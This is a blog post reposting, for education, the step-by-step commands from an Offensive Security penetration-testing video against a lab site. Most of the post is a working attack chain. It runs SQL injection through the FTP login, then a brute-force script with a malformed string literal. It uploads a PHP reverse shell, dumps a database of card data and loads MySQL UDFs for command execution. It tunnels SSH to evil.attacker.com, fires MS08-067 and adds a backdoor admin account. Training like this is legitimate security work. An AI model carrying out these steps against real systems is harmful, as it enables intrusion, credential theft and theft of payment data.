Samiux's Blog

Open Source is a great idea and it has changed the world! Open Source forever ....

While you do not know attack, how can you know about defense? (未知攻,焉知防?)

Do BAD things .... for the RIGHT reasons -- OWASP ZAP

It is easier to port a shell than a shell script. -- Larry Wall

Most of you are familiar with the virtues of a programmer. There are three, of course: laziness, impatience, and hubris. -- Larry Wall

为天地立心，为生民立命，为往圣继绝学，为万世开太平。 -- 王炜

Monday, September 12, 2011

HOWTO : Penetration Testing in the Real World

*** Do NOT attack any computer or network without authorization or you may be put into jail. ***

Credit to : muts (of Offensive Security)

This is muts's work but not mine. I re-post here for educational purpose only. It is because I enjoy his videos very much and I am afraid of losing them.

Penetration Testing in the Real World from Offensive Security on Vimeo.

ftp-brute.py



#!/usr/bin/python

from ftplib import FTP

print "Attempting user Directory Discover via FTP"

for i in range(0,6):



   username=%') and 1=2 union select 1,1,uid,gid,homedir,shell from ftpuser LIMIT "+ STR(I)+",1; --  "

   password=str("1")

   ftp=FTP('www.offseclabs.com')

   ftp.login(username,password)

   print "Logged in as user "+str(i)+",1"

   ftp.retrlines('LIST')

   ftp.close()

Commands



Open Terminal A :



nmap -p 21,80 www.offseclabs.com

nc -v www.offseclabs.com 80

HEAD / HTTP/1.0

(To enumerate the webserver)

clear



ftp www.offseclabs.com

username - bob

password - bob

(To enumerate the ftp server)



ftp www.offseclabs.com

username - %') and 1=2 union select 1,1,uid,gid,homedir,shell from ftpuser; --  

password - 1



(logged in to the ftp server)

pwd

ls

bye



clear



cd core

clear

nano brute.py --> (see above ftp-brute.py)

./brute.py

(get the fifth user who has mapped to the root directory of webserver)

clear



ftp www.offseclabs.com

username - %') and 1=2 union select 1,1,uid,gid,homedir,shell from ftpuser LIMIT 5,1; --  

password - 1



(logged in as the fifth user)

ls

put rs.php --> (a reverse php shell)



-----------------------

Open Terminal B :



nc -lvp 80



-----------------------

Open Terminal C :



wget www.offseclabs.com/rs.php



(Then, at Terminal B, we got a reverse shell)



-----------------------

Go back to Terminal B :

(inside the reverse shell)



/sbin/ifconfig

pwd

cd /var/www

ls -la

cd includes

cat configure.php

(get the MySQL username and password as well as MySQL server address and database name)



mysqldump -u root -p1q2w3e4r5t6y -h 10.150.0.5 oscommerce > /var/www/images/ccdump.txt



------------------------

Open a Firefox :



www.offseclabs.com/images/ccdump.txt

(we got the database dump)



-------------------------

Go back to Terminal A :



(inside the ftp server)

put up.html --> (file upload html file)

put up.php -- > (file upload php file)



-------------------------

Open Firefox :



www.offseclabs.com/up.html



(upload lib_mysqludf_sys.so and marked it as 1)

(upload rs [a binary reverse shell) and marked it as 2)



** Details of lib_mysqludf_sys.so



---------------------------

Go back to Terminal A :



(quit the ftp server)

bye

clear

exit

(quit Terminal A)



----------------------------

Go back to Terminal B :



mysql -u root -p1q2w3e4r5t6y -h 10.150.0.5

(login to MySQL server)

use pwn;

SELECT imgdata from binfile where title="1" into dumpfile '/usr/lib/lib_mysqludf_sys.so';

SELECT imgdata from binfile where title="2" into dumpfile '/tmp/db';



CREATE FUNCTION lib_mysqludf_sys_info RETURNS string SONAME 'lib_mysqludf_sys.so';

CREATE FUNCTION sys_get RETURNS string SONAME 'lib_mysqludf_sys.so';

CREATE FUNCTION sys_set RETURNS int SONAME 'lib_mysqludf_sys.so';

CREATE FUNCTION sys_exec RETURNS int SONAME 'lib_mysqludf_sys.so';

CREATE FUNCTION sys_eval RETURNS string SONAME 'lib_mysqludf_sys.so';



SELECT sys_eval('chmod 755 /tmp/bd');

SELECT sys_eval('/tmp/bd &');

(don't press Enter at this moment)



---------------------------

Open Terminal D :



nc -lvp 80



(go back to Terminal B and press enter, you will get reserver shell at Terminal D)



----------------------------

Open Terminal E :



nc -lvp 80



----------------------------

Go back to Terminal B :



(inside the MySQL server)

SELECT sys_eval('/tmp/bd &');



(press enter and we got another reverse shell at Terminal E)



---------------------------

Go back to Terminal E :



(inside the reverse shell)

ping -c 1 10.150.0.20

clear



ssh -l root -t -t -R 445:10.150.0.20:445 evil.attacker.com

(create a remote tunnel at port 445)



-----------------------------

Open Terminal F :



netstat antp

nmap -sS 127.0.0.1 -p445 --script smb-check-vulns.nse



-----------------------------

Go back to Terminal D :



ssh -l root -t -t -R 4444:10.150.0.20:4444 evil.attacker.com

(create a remote tunnel at port 4444)



clear



------------------------------

Go back to Terminal F :



cd core

nano nx.py --> (a ms08-067 python exploit for win2k3 sp2)

clear

./nx.py 127.0.0.1

nc -v 127.0.0.1 4444



(we got a remote shell of 10.150.0.20)

ip config

net user hacker hacker /add

net localgroup administrators hacker /add



---------------------------------

Go back to Terminal D :



(quit the tunnel)

exit

clear



ssh -l root -t -t -R 3389:10.150.0.20:3389 evil.attacker.com

(create another remote tunnel on port 3389)

clear



-----------------------------------

Open Terminal G :



netstat -antp | grep LISTEN

clear

rdesktop 127.0.0.1



(login to the 10.150.0.20 with username - hacker and password - hacker)

That's all! See you.